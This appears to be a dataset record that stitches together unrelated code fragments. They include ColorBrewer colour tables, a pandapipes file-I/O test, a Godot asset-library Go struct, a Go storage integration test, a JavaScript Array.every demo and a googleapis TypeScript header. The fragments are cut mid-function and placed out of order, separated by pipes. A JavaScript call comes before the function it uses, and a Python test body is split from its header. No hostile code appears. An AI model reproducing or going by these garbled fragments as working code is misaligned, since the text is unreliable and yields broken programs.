9: ["#f7f4f9","#e7e1ef","#d4b9da","#c994c7","#df65b0","#e7298a","#ce1256","#980043","#67001f"]
},OrRd: {
3: ["#fee8c8","#fdbb84","#e34a33"],
4: ["#fef0d9","#fdcc8a","#fc8d59","#d7301f"],
5: ["#fef0d9","#fdcc8a","#fc8d59","#e34a33","#b30000"],
6: ["#fef0d9","#fdd49e","#fdbb84","#fc8d59","#e34a33","#b30000"],
7: ["#fef0d9","#fdd49e","#fdbb84","#fc8d59","#ef6548","#d7301f","#990000"],
8: ["#fff7ec","#fee8c8","#fdd49e","#fdbb84","#fc8d59","#ef6548","#d7301f","#990000"],
9: ["#fff7ec","#fee8c8","#fdd49e","#fdbb84","#fc8d59","#ef6548","#d7301f","#b30000","#7f0000"]
},YlOrRd: {
3: ["#ffeda0","#feb24c","#f03b20"],
4: ["#ffffb2","#fecc5c","#fd8d3c","#e31a1c"],
5: ["#ffffb2","#fecc5c","#fd8d3c","#f03b20","#bd0026"],
6: ["#ffffb2","#fed976","#feb24c","#fd8d3c","#f03b20","#bd0026"],
7: ["#ffffb2","#fed976","#feb24c","#fd8d3c","#fc4e2a","#e31a1c","#b10026"],
8: ["#ffffcc","#ffeda0","#fed976","#feb24c","#fd8d3c","#fc4e2a","#e31a1c","#b10026"],
9: ["#ffffcc","#ffeda0","#fed976","#feb24c","#fd8d3c","#fc4e2a","#e31a1c","#bd0026","#800026"]
},YlOrBr: {
3: ["#fff7bc","#fec44f","#d95f0e"],
4: ["#ffffd4","#fed98e","#fe9929","#cc4c02"],
5: ["#ffffd4","#fed98e","#fe9929","#d95f0e","#993404"],
6: ["#ffffd4","#fee391","#fec44f","#fe9929","#d95f0e","#993404"],
7: ["#ffffd4","#fee391","#fec44f","#fe9929","#ec7014","#cc4c02","#8c2d04"],
8: ["#ffffe5","#fff7bc","#fee391","#fec44f","#fe9929","#ec7014","#cc4c02","#8c2d04"],
9: ["#ffffe5","#fff7bc","#fee391","#fec44f","#fe9929","#ec7014","#cc4c02","#993404","#662506"]
},Purples: {
3: ["#efedf5","#bcbddc","#756bb1"],
4: ["#f2f0f7","#cbc9e2","#9e9ac8","#6a51a3"],
5: ["#f2f0f7","#cbc9e2","#9e9ac8","#756bb1","#54278f"],
6: ["#f2f0f7","#dadaeb","#bcbddc","#9e9ac8","#756bb1","#54278f"],
7: ["#f2f0f7","#dadaeb","#bcbddc","#9e9ac8","#807dba","#6a51a3","#4a1486"],
8: ["#fcfbfd","#efedf5","#dadaeb","#bcbddc","#9e9ac8","#807dba","#6a51a3","#4a1486"],
9: ["#fcfbfd","#efedf5","#dadaeb","#bcbddc","#9e9ac8","#807dba","#6a51a3","#54278f","#3f007d"]
},Blues: {
3: ["#deebf7","#9ecae1","#3182bd"],
4: ["#eff3ff","#bdd7e7","#6baed6","#2171b5"],
5: ["#eff3ff","#bdd7e7","#6baed6","#3182bd","#08519c"],
6: ["#eff3ff","#c6dbef","#9ecae1","#6baed6","#3182bd","#08519c"],
7: ["#eff3ff","#c6dbef","#9ecae1","#6baed6","#4292c6","#2171b5","#084594"],
8: ["#f7fbff","#deebf7","#c6dbef","#9ecae1","#6baed6","#4292c6","#2171b5","#084594"],
9: ["#f7fbff","#deebf7","#c6dbef","#9ecae1","#6baed6","#4292c6","#2171b5","#08519c","#08306b"]
},Greens: {
3: ["#e5f5e0","#a1d99b","#31a354"],
4: ["#edf8e9","#bae4b3","#74c476","#238b45"],
5: ["#edf8e9","#bae4b3","#74c476","#31a354","#006d2c"],
6: ["#edf8e9","#c7e9c0","#a1d99b","#74c476","#31a354","#006d2c"],
7: ["#edf8e9","#c7e9c0","#a1d99b","#74c476","#41ab5d","#238b45","#005a32"],
8: ["#f7fcf5","#e5f5e0","#c7e9c0","#a1d99b","#74c476","#41ab5d","#238b45","#005a32"],
9: ["#f7fcf5","#e5f5e0","#c7e9c0","#a1d99b","#74c476","#41ab5d","#238b45","#006d2c","#00441b"]
},Oranges: {
3: ["#fee6ce","#fdae6b","#e6550d"],
4: ["#feedde","#fdbe85","#fd8d3c","#d94701"],
5: ["#feedde","#fdbe85","#fd8d3c","#e6550d","#a63603"],
6: ["#feedde","#fdd0a2","#fdae6b","#fd8d3c","#e6550d","#a63603"],
7: ["#feedde","#fdd0a2","#fdae6b","#fd8d3c","#f16913","#d94801","#8c2d04"],
8: ["#fff5eb","#fee6ce","#fdd0a2","#fdae6b","#fd8d3c","#f16913","#d94801","#8c2d04"],
9: ["#fff5eb","#fee6ce","#fdd0a2","#fdae6b","#fd8d3c","#f16913","#d94801","#a63603","#7f2704"]
},Reds: {
3: ["#fee0d2","#fc9272","#de2d26"],
4: ["#fee5d9","#fcae91","#fb6a4a","#cb181d"],
5: ["#fee5d9","#fcae91","#fb6a4a","#de2d26","#a50f15"], | 8: ["#fff5f0","#fee0d2","#fcbba1","#fc9272","#fb6a4a","#ef3b2c","#cb181d","#99000d"],
9: ["#fff5f0","#fee0d2","#fcbba1","#fc9272","#fb6a4a","#ef3b2c","#cb181d","#a50f15","#67000d"]
},Greys: {
3: ["#f0f0f0","#bdbdbd","#636363"],
4: ["#f7f7f7","#cccccc","#969696","#525252"],
5: ["#f7f7f7","#cccccc","#969696","#636363","#252525"],
6: ["#f7f7f7","#d9d9d9","#bdbdbd","#969696","#636363","#252525"],
7: ["#f7f7f7","#d9d9d9","#bdbdbd","#969696","#737373","#525252","#252525"],
8: ["#ffffff","#f0f0f0","#d9d9d9","#bdbdbd","#969696","#737373","#525252","#252525"],
9: ["#ffffff","#f0f0f0","#d9d9d9","#bdbdbd","#969696","#737373","#525252","#252525","#000000"]
},PuOr: {
3: ["#f1a340","#f7f7f7","#998ec3"],
4: ["#e66101","#fdb863","#b2abd2","#5e3c99"],
5: ["#e66101","#fdb863","#f7f7f7","#b2abd2","#5e3c99"],
6: ["#b35806","#f1a340","#fee0b6","#d8daeb","#998ec3","#542788"],
7: ["#b35806","#f1a340","#fee0b6","#f7f7f7","#d8daeb","#998ec3","#542788"],
8: ["#b35806","#e08214","#fdb863","#fee0b6","#d8daeb","#b2abd2","#8073ac","#542788"],
9: ["#b35806","#e08214","#fdb863","#fee0b6","#f7f7f7","#d8daeb","#b2abd2","#8073ac","#542788"],
10: ["#7f3b08","#b35806","#e08214","#fdb863","#fee0b6","#d8daeb","#b2abd2","#8073ac","#542788","#2d004b"],
11: ["#7f3b08","#b35806","#e08214","#fdb863","#fee0b6","#f7f7f7","#d8daeb","#b2abd2","#8073ac","#542788","#2d004b"]
},BrBG: {
3: ["#d8b365","#f5f5f5","#5ab4ac"],
4: ["#a6611a","#dfc27d","#80cdc1","#018571"],
5: ["#a6611a","#dfc27d","#f5f5f5","#80cdc1","#018571"],
6: ["#8c510a","#d8b365","#f6e8c3","#c7eae5","#5ab4ac","#01665e"],
7: ["#8c510a","#d8b365","#f6e8c3","#f5f5f5","#c7eae5","#5ab4ac","#01665e"],
8: ["#8c510a","#bf812d","#dfc27d","#f6e8c3","#c7eae5","#80cdc1","#35978f","#01665e"],
9: ["#8c510a","#bf812d","#dfc27d","#f6e8c3","#f5f5f5","#c7eae5","#80cdc1","#35978f","#01665e"],
10: ["#543005","#8c510a","#bf812d","#dfc27d","#f6e8c3","#c7eae5","#80cdc1","#35978f","#01665e","#003c30"],
11: ["#543005","#8c510a","#bf812d","#dfc27d","#f6e8c3","#f5f5f5","#c7eae5","#80cdc1","#35978f","#01665e","#003c30"]
},PRGn: {
3: ["#af8dc3","#f7f7f7","#7fbf7b"],
4: ["#7b3294","#c2a5cf","#a6dba0","#008837"],
5: ["#7b3294","#c2a5cf","#f7f7f7","#a6dba0","#008837"],
6: ["#762a83","#af8dc3","#e7d4e8","#d9f0d3","#7fbf7b","#1b7837"],
7: ["#762a83","#af8dc3","#e7d4e8","#f7f7f7","#d9f0d3","#7fbf7b","#1b7837"],
8: ["#762a83","#9970ab","#c2a5cf","#e7d4e8","#d9f0d3","#a6dba0","#5aae61","#1b7837"],
9: ["#762a83","#9970ab","#c2a5cf","#e7d4e8","#f7f7f7","#d9f0d3","#a6dba0","#5aae61","#1b7837"],
10: ["#40004b","#762a83","#9970ab","#c2a5cf","#e7d4e8","#d9f0d3","#a6dba0","#5aae61","#1b7837","#00441b"],
11: ["#40004b","#762a83","#9970ab","#c2a5cf","#e7d4e8","#f7f7f7","#d9f0d3","#a6dba0","#5aae61","#1b7837","#00441b"]
},PiYG: {
3: ["#e9a3c9","#f7f7f7","#a1d76a"],
4: ["#d01c8b","#f1b6da","#b8e186","#4dac26"],
5: ["#d01c8b","#f1b6da","#f7f7f7","#b8e186","#4dac26"],
6: ["#c51b7d","#e9a3c9","#fde0ef","#e6f5d0","#a1d76a","#4d9221"],
7: ["#c51b7d","#e9a3c9","#fde0ef","#f7f7f7","#e6f5d0","#a1d76a","#4d9221"],
8: ["#c51b7d","#de77ae","#f1b6da","#fde0ef","#e6f5d0","#b8e186","#7fbc41","#4d9221"],
9: ["#c51b7d","#de77ae","#f1b6da","#fde0ef","#f7f7f7","#e6f5d0","#b8e186","#7fbc41","#4d9221"],
10: ["#8e0152","#c51b7d","#de77ae","#f1b6da","#fde0ef","#e6f5d0","#b8e186","#7fbc41","#4d9221","#276419"],
11: ["#8e0152","#c51b7d","#de77ae","#f1b6da","#fde0ef","#f7f7f7","#e6f5d0","#b8e186","#7fbc41","#4d9221","#276419"]
},RdBu: {
3: ["#ef8a62","#f7f7f7","#67a9cf"],
4: ["#ca0020","#f4a582","#92c5de","#0571b0"],
5: ["#ca0020","#f4a582","#f7f7f7","#92c5de","#0571b0"],
6: ["#b2182b","#ef8a62","#fddbc7","#d1e5f0","#67a9cf","#2166ac"],
7: ["#b2182b","#ef8a62","#fddbc7","#f7f7f7","#d1e5f0","#67a9cf","#2166ac"],
8: ["#b2182b","#d6604d","#f4a582","#fddbc7","#d1e5f0","#92c5de","#4393c3","#2166ac"],
9: ["#b2182b","#d6604d","#f4a582","#fddbc7","#f7f7f7","#d1e5f0","#92c5de","#4393c3","#2166ac"],
10: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#d1e5f0","#92c5de","#4393c3","#2166ac","#053061"],
11: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#f7f7f7","#d1e5f0","#92c5de","#4393c3","#2166ac","#053061"]
},RdGy: {
3: ["#ef8a62","#ffffff","#999999"],
4: ["#ca0020","#f4a582","#bababa","#404040"],
5: ["#ca0020","#f4a582","#ffffff","#bababa","#404040"],
6: ["#b2182b","#ef8a62","#fddbc7","#e0e0e0","#999999","#4d4d4d"],
7: ["#b2182b","#ef8a62","#fddbc7","#ffffff","#e0e0e0","#999999","#4d4d4d"],
8: ["#b2182b","#d6604d","#f4a582","#fddbc7","#e0e0e0","#bababa","#878787","#4d4d4d"],
9: ["#b2182b","#d6604d","#f4a582","#fddbc7","#ffffff","#e0e0e0","#bababa","#878787","#4d4d4d"],
10: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#e0e0e0","#bababa","#878787","#4d4d4d","#1a1a1a"],
11: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#ffffff","#e0e0e0","#bababa","#878787","#4d4d4d","#1a1a1a"]
},RdYlBu: {
3: ["#fc8d59","#ffffbf","#91bfdb"],
4: ["#d7191c","#fdae61","#abd9e9","#2c7bb6"],
5: ["#d7191c","#fdae61","#ffffbf","#abd9e9","#2c7bb6"],
6: ["#d73027","#fc8d59","#fee090","#e0f3f8","#91bfdb","#4575b4"],
7: ["#d73027","#fc8d59","#fee090","#ffffbf","#e0f3f8","#91bfdb","#4575b4"],
8: ["#d73027","#f46d43","#fdae61","#fee090","#e0f3f8","#abd9e9","#74add1","#4575b4"],
9: ["#d73027","#f46d43","#fdae61","#fee090","#ffffbf","#e0f3f8","#abd9e9","#74add1","#4575b4"],
10: ["#a50026","#d73027","#f46d43","#fdae61","#fee090","#e0f3f8","#abd9e9","#74add1","#4575b4","#313695"],
11: ["#a50026","#d73027","#f46d43","#fdae61","#fee090","#ffffbf","#e0f3f8","#abd9e9","#74add1","#4575b4","#313695"]
},Spectral: {
3: ["#fc8d59","#ffffbf","#99d594"],
4: ["#d7191c","#fdae61","#abdda4","#2b83ba"],
5: ["#d7191c","#fdae61","#ffffbf","#abdda4","#2b83ba"],
6: ["#d53e4f","#fc8d59","#fee08b","#e6f598","#99d594","#3288bd"],
7: ["#d53e4f","#fc8d59","#fee08b","#ffffbf","#e6f598","#99d594","#3288bd"],
8: ["#d53e4f","#f46d43","#fdae61","#fee08b","#e6f598","#abdda4","#66c2a5","#3288bd"],
9: ["#d53e4f","#f46d43","#fdae61","#fee08b","#ffffbf","#e6f598","#abdda4","#66c2a5","#3288bd"],
10: ["#9e0142","#d53e4f","#f46d43","#fdae61","#fee08b","#e6f598","#abdda4","#66c2a5","#3288bd","#5e4fa2"],
11: ["#9e0142","#d53e4f","#f46d43","#fdae61","#fee08b","#ffffbf","#e6f598","#abdda4","#66c2a5","#3288bd","#5e4fa2"]
},RdYlGn: {
3: ["#fc8d59","#ffffbf","#91cf60"],
4: ["#d7191c","#fdae61","#a6d96a","#1a9641"],
5: ["#d7191c","#fdae61","#ffffbf","#a6d96a","#1a9641"],
6: ["#d73027","#fc8d59","#fee08b","#d9ef8b","#91cf60","#1a9850"],
7: ["#d73027","#fc8d59","#fee08b","#ffffbf","#d9ef8b","#91cf60","#1a9850"],
8: ["#d73027","#f46d43","#fdae61","#fee08b","#d9ef8b","#a6d96a","#66bd63","#1a9850"],
9: ["#d73027","#f46d43","#fdae61","#fee08b","#ffffbf","#d9ef8b","#a6d96a","#66bd63","#1a9850"],
10: ["#a50026","#d73027","#f46d43","#fdae61","#fee08b","#d9ef8b","#a6d96a","#66bd63","#1a9850","#006837"],
11: ["#a50026","#d73027","#f46d43","#fdae61","#fee08b","#ffffbf","#d9ef8b","#a6d96a","#66bd63","#1a9850","#006837"]
},Accent: {
3: ["#7fc97f","#beaed4","#fdc086"],
4: ["#7fc97f","#beaed4","#fdc086","#ffff99"],
5: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0"],
6: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0","#f0027f"],
7: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0","#f0027f","#bf5b17"],
8: ["#7fc97f","#beaed4","#fdc086","#ffff99","#386cb0","#f0027f","#bf5b17","#666666"]
},Dark2: {
3: ["#1b9e77","#d95f02","#7570b3"],
4: ["#1b9e77","#d95f02","#7570b3","#e7298a"],
5: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e"],
6: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e","#e6ab02"],
7: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e","#e6ab02","#a6761d"],
8: ["#1b9e77","#d95f02","#7570b3","#e7298a","#66a61e","#e6ab02","#a6761d","#666666"]
},Paired: {
3: ["#a6cee3","#1f78b4","#b2df8a"],
4: ["#a6cee3","#1f78b4","#b2df8a","#33a02c"],
5: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99"],
6: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c"],
7: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f"],
8: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00"],
9: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6"],
10: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6","#6a3d9a"],
11: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6","#6a3d9a","#ffff99"],
12: ["#a6cee3","#1f78b4","#b2df8a","#33a02c","#fb9a99","#e31a1c","#fdbf6f","#ff7f00","#cab2d6","#6a3d9a","#ffff99","#b15928"]
},Pastel1: {
3: ["#fbb4ae","#b3cde3","#ccebc5"],
4: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4"],
5: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6"],
6: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc"],
7: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc","#e5d8bd"],
8: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc","#e5d8bd","#fddaec"],
9: ["#fbb4ae","#b3cde3","#ccebc5","#decbe4","#fed9a6","#ffffcc","#e5d8bd","#fddaec","#f2f2f2"]
},Pastel2: {
3: ["#b3e2cd","#fdcdac","#cbd5e8"],
4: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4"],
5: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9"],
6: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9","#fff2ae"],
7: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9","#fff2ae","#f1e2cc"],
8: ["#b3e2cd","#fdcdac","#cbd5e8","#f4cae4","#e6f5c9","#fff2ae","#f1e2cc","#cccccc"]
},Set1: {
3: ["#e41a1c","#377eb8","#4daf4a"],
4: ["#e41a1c","#377eb8","#4daf4a","#984ea3"],
5: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00"],
6: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33"],
7: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33","#a65628"],
8: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33","#a65628","#f781bf"],
9: ["#e41a1c","#377eb8","#4daf4a","#984ea3","#ff7f00","#ffff33","#a65628","#f781bf","#999999"]
},Set2: {
3: ["#66c2a5","#fc8d62","#8da0cb"],
4: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3"],
5: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854"],
6: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854","#ffd92f"],
7: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854","#ffd92f","#e5c494"],
8: ["#66c2a5","#fc8d62","#8da0cb","#e78ac3","#a6d854","#ffd92f","#e5c494","#b3b3b3"]
},Set3: {
3: ["#8dd3c7","#ffffb3","#bebada"],
4: ["#8dd3c7","#ffffb3","#bebada","#fb8072"],
5: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3"],
6: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462"],
7: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69"],
8: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5"],
9: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9"],
10: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9","#bc80bd"],
11: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9","#bc80bd","#ccebc5"],
12: ["#8dd3c7","#ffffb3","#bebada","#fb8072","#80b1d3","#fdb462","#b3de69","#fccde5","#d9d9d9","#bc80bd","#ccebc5","#ffed6f"]
}}; | 6: ["#fee5d9","#fcbba1","#fc9272","#fb6a4a","#de2d26","#a50f15"],
7: ["#fee5d9","#fcbba1","#fc9272","#fb6a4a","#ef3b2c","#cb181d","#99000d"], |
test_file_io.py | # Copyright (c) 2020 by Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import os
import pandapipes
import pytest
from pandapower.test.toolbox import tempdir
from pandas.testing import assert_frame_equal
# @pytest.fixture()
def load_net():
# create test network
net = pandapipes.create_empty_network("test_net", fluid="lgas")
j1 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15,
name="Connection to External Grid", geodata=(0, 0))
j2 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 2",
geodata=(2, 0))
j3 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 3",
geodata=(7, 4))
j4 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 4",
geodata=(7, -4))
j5 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 5",
geodata=(5, 3))
j6 = pandapipes.create_junction(net, pn_bar=1.05, tfluid_k=293.15, name="Junction 6",
geodata=(5, -3))
pandapipes.create_ext_grid(net, junction=j1, p_bar=1.1, t_k=293.15, name="Grid Connection")
pandapipes.create_pipe_from_parameters(net, from_junction=j1, to_junction=j2, length_km=10,
diameter_m=0.05, name="Pipe 1", geodata=[(0, 0), (2, 0)])
pandapipes.create_pipe_from_parameters(net, from_junction=j2, to_junction=j3, length_km=2,
diameter_m=0.05, name="Pipe 2",
geodata=[(2, 0), (2, 4), (7, 4)])
pandapipes.create_pipe_from_parameters(net, from_junction=j2, to_junction=j4, length_km=2.5,
diameter_m=0.05, name="Pipe 3",
geodata=[(2, 0), (2, -4), (7, -4)])
pandapipes.create_pipe_from_parameters(net, from_junction=j3, to_junction=j5, length_km=1,
diameter_m=0.05, name="Pipe 4",
geodata=[(7, 4), (7, 3), (5, 3)])
pandapipes.create_pipe_from_parameters(net, from_junction=j4, to_junction=j6, length_km=1,
diameter_m=0.05, name="Pipe 5",
geodata=[(7, -4), (7, -3), (5, -3)])
pandapipes.create_valve(net, from_junction=j5, to_junction=j6, diameter_m=0.05,
opened=True)
pandapipes.create_sink(net, junction=j4, mdot_kg_per_s=5.45e-5, name="Sink 1")
pandapipes.create_source(net, junction=j3, mdot_kg_per_s=3.45e-5)
return net
def test_pickle(tempdir):
"""
Checks if a network saved and reloaded as a pickle file is identical.
:return:
:rtype:
"""
net = load_net()
filename = os.path.join(tempdir, "test_net_1.p")
# save test network
pandapipes.to_pickle(net, filename)
# load test network
net2 = pandapipes.from_pickle(filename)
# check if saved and loaded versions are identical
assert pandapipes.nets_equal(net, net2), "Error in comparison after saving to Pickle."
def test_json(tempdir):
|
def test_json_string():
"""
Checks if a network saved and reloaded as a json file is identical.
:return:
:rtype:
"""
net = load_net()
# save test network
json_string = pandapipes.to_json(net)
# load test network
net2 = pandapipes.from_json_string(json_string)
# check if saved and loaded versions are identical
assert_frame_equal(net.pipe_geodata, net2.pipe_geodata)
del net.pipe_geodata
del net2.pipe_geodata
assert pandapipes.nets_equal(net, net2),\
"Error in comparison after saving to JSON string."
if __name__ == '__main__':
pytest.main(["test_file_io.py"])
| """
Checks if a network saved and reloaded as a json file is identical.
:return:
:rtype:
"""
net = load_net()
filename = os.path.join(tempdir, "test_net_1.json")
# save test network
pandapipes.to_json(net, filename)
# load test network
net2 = pandapipes.from_json(filename)
# check if saved and loaded versions are identical
assert_frame_equal(net.pipe_geodata, net2.pipe_geodata)
del net.pipe_geodata
del net2.pipe_geodata
assert pandapipes.nets_equal(net, net2), "Error in comparison after saving to JSON." |
model_asset_details.go | /*
* Godot Asset Library
*
* Godot Engine's asset library
*
* API version: 1.0.0
* Generated by: Swagger Codegen (https://github.com/swagger-api/swagger-codegen.git)
*/
package swagger
// A resource provided by the asset library (add-on, project, ...).<br> These properties are only returned when requesting a specific asset, not a list of assets.
type AssetDetails struct {
// The asset's unique identifier.
AssetId string `json:"asset_id,omitempty"`
// The asset's type, can be \"addon\" or \"project\".
Type_ string `json:"type,omitempty"`
// The author's username.
Author string `json:"author,omitempty"`
// The author's unique identifier.
AuthorId string `json:"author_id,omitempty"`
// The category the asset belongs to.
Category string `json:"category,omitempty"` | CategoryId string `json:"category_id,omitempty"`
DownloadProvider string `json:"download_provider,omitempty"`
DownloadCommit string `json:"download_commit,omitempty"`
// The asset's SHA-256 hash for the latest version. **Note:** This is currently always an empty string as asset versions' hashes aren't computed and stored yet.
DownloadHash string `json:"download_hash,omitempty"`
// The asset's license as a [SPDX license identifier](https://spdx.org/licenses/). For compatibility reasons, this field is called `cost` instead of `license`.
Cost string `json:"cost,omitempty"`
// The Godot version the asset's latest version is intended for (in `major.minor` format).<br> This field is present for compatibility reasons with the Godot editor. See also the `versions` array.
GodotVersion string `json:"godot_version,omitempty"`
// The asset's icon URL (should always be a PNG image).
IconUrl string `json:"icon_url,omitempty"`
// If `true`, the asset is marked as archived by its author. When archived, it can't receive any further reviews but can still be unarchived at any time by the author.
IsArchived bool `json:"is_archived,omitempty"`
// The asset's issue reporting URL (typically associated with the Git repository specified in `browse_url`).
IssuesUrl string `json:"issues_url,omitempty"`
// The date on which the asset entry was last updated. Note that entries can be edited independently of new asset versions being released.
ModifyDate string `json:"modify_date,omitempty"`
// The asset's rating (unused). For compatibility reasons, a value of 0 is always returned. You most likely want `score` instead.
Rating string `json:"rating,omitempty"`
// The asset's support level.
SupportLevel string `json:"support_level,omitempty"`
// The asset's title (usually less than 50 characters).
Title string `json:"title,omitempty"`
// The asset revision string (starting from 1).<br> Every time the asset is edited (for anyone and for any reason), this string is incremented by 1.
Version string `json:"version,omitempty"`
// The version string of the latest version (free-form, but usually `major.minor` or `major.minor.patch`).<br> This field is present for compatibility reasons with the Godot editor. See also the `versions` array.
VersionString string `json:"version_string,omitempty"`
Searchable string `json:"searchable,omitempty"`
Previews []AssetPreview `json:"previews,omitempty"`
// The asset's browsable repository URL.
BrowseUrl string `json:"browse_url,omitempty"`
// The asset's full description.
Description string `json:"description,omitempty"`
// The download link of the asset's latest version (should always point to a ZIP archive).<br> This field is present for compatibility reasons with the Godot editor. See also the `versions` array.
DownloadUrl string `json:"download_url,omitempty"`
} | // The unique identifier of the category the asset belongs to. |
integration_test.go | package storage
import (
"os"
"io"
. "bytes"
"testing"
"fmt"
"strings"
)
const (
TEST_DIR = "test_dir"
STORAGE_BACKEND = "GCS"
TEST_CHUNKSIZE = int64(16 * 1024 * 1024) // 16 MB
)
func setEnv() |
func TestMain(m *testing.M) {
setEnv()
exit := m.Run()
os.Exit(exit)
}
func Test_ObjectWrite(t *testing.T) {
objects, err:= NewObjectAPI(TEST_DIR, 0, STORAGE_BACKEND)
file_path, csum, bwrt, err := objects.CreateObject("objects", strings.NewReader("Hello"), false)
fmt.Println("file_path, checksum, bytes: ", file_path, csum, bwrt)
if err != nil {
fmt.Println("error put object: \n", err)
}
fmt.Println("Sent object. Bytes written:", file_path, bwrt)
b := objects.CheckObject(file_path)
if (!b) {
t.Fatalf("Unexpected Error in creation of object in objectCreate()")
}
fmt.Println("Deleting object:", file_path)
err = objects.DeleteObject(file_path)
if err != nil {
fmt.Println("Failed to delete object from server:", err)
t.Fatalf("Failed to delete object from server")
}
}
/*
func Test_ReadObject(t *testing.T) {
var data Buffer
api, err:= NewObjectAPI(TEST_DIR, 0, STORAGE_BACKEND)
file_path, _, _, err := api.PutObject("objects", strings.NewReader("Hello"), false)
if err != nil {
fmt.Println("error in put object: \n", err)
t.Fatalf("Failed to write file on server for reading")
}
_, err = api.ReadObject(file_path, &data)
if err != nil {
fmt.Println("Read object failed", err)
}
fmt.Println("size of data:", data.Len())
fmt.Println("data:", &data)
}*/
func putTestFile(api ObjectAPIServer) (string, error) {
file_path, _, _, err := api.CreateObject("objects", strings.NewReader("Hello World. Testing text files. Short files."), false)
if err != nil {
fmt.Println("error in put object: \n", err)
return "", err
}
return file_path, err
}
func Test_ReadObjectInChunks(t *testing.T) {
var data Buffer
var file_path string
api, err:= NewObjectAPI(TEST_DIR, 0, STORAGE_BACKEND)
var size uint64
var offset uint64
var n int64
file_path, err = putTestFile(api)
offset = 0
size = 1
var block_size uint64 = 1
for {
n, err = api.ReadObject(file_path, int64(offset), int64(size), &data)
if err == io.EOF {
break
}
offset = offset + block_size
}
var byt byte
str, err := data.ReadString(byt)
fmt.Println("data: ", str)
fmt.Println("size read:", n)
if err!= nil && err != io.EOF {
t.Fatalf("Error occured during seek %d %d",offset, size)
}
}
| {
os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/Users/apple/MyProjects/creds/hw-storage-75d060e8419a.json")
os.Setenv("GOOGLE_STORAGE_BUCKET", "hyperflow001")
} |
demoEvery.js | const myArr = [1, 15, 23, 6, 42]; | console.log(myArr.every(isBelow)); |
const isBelow = (x) => x < 45;
|
v1.ts | // Copyright 2020 Google LLC
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/* eslint-disable @typescript-eslint/no-explicit-any */
/* eslint-disable @typescript-eslint/class-name-casing */
/* eslint-disable @typescript-eslint/no-unused-vars */
/* eslint-disable @typescript-eslint/no-empty-interface */
/* eslint-disable @typescript-eslint/no-namespace */
/* eslint-disable no-irregular-whitespace */
import {
OAuth2Client,
JWT,
Compute,
UserRefreshClient,
BaseExternalAccountClient,
GaxiosPromise,
GoogleConfigurable,
createAPIRequest,
MethodOptions,
StreamMethodOptions,
GlobalOptions,
GoogleAuth,
BodyResponseCallback,
APIRequestContext,
} from 'googleapis-common';
import {Readable} from 'stream';
export namespace searchconsole_v1 {
export interface Options extends GlobalOptions {
version: 'v1';
}
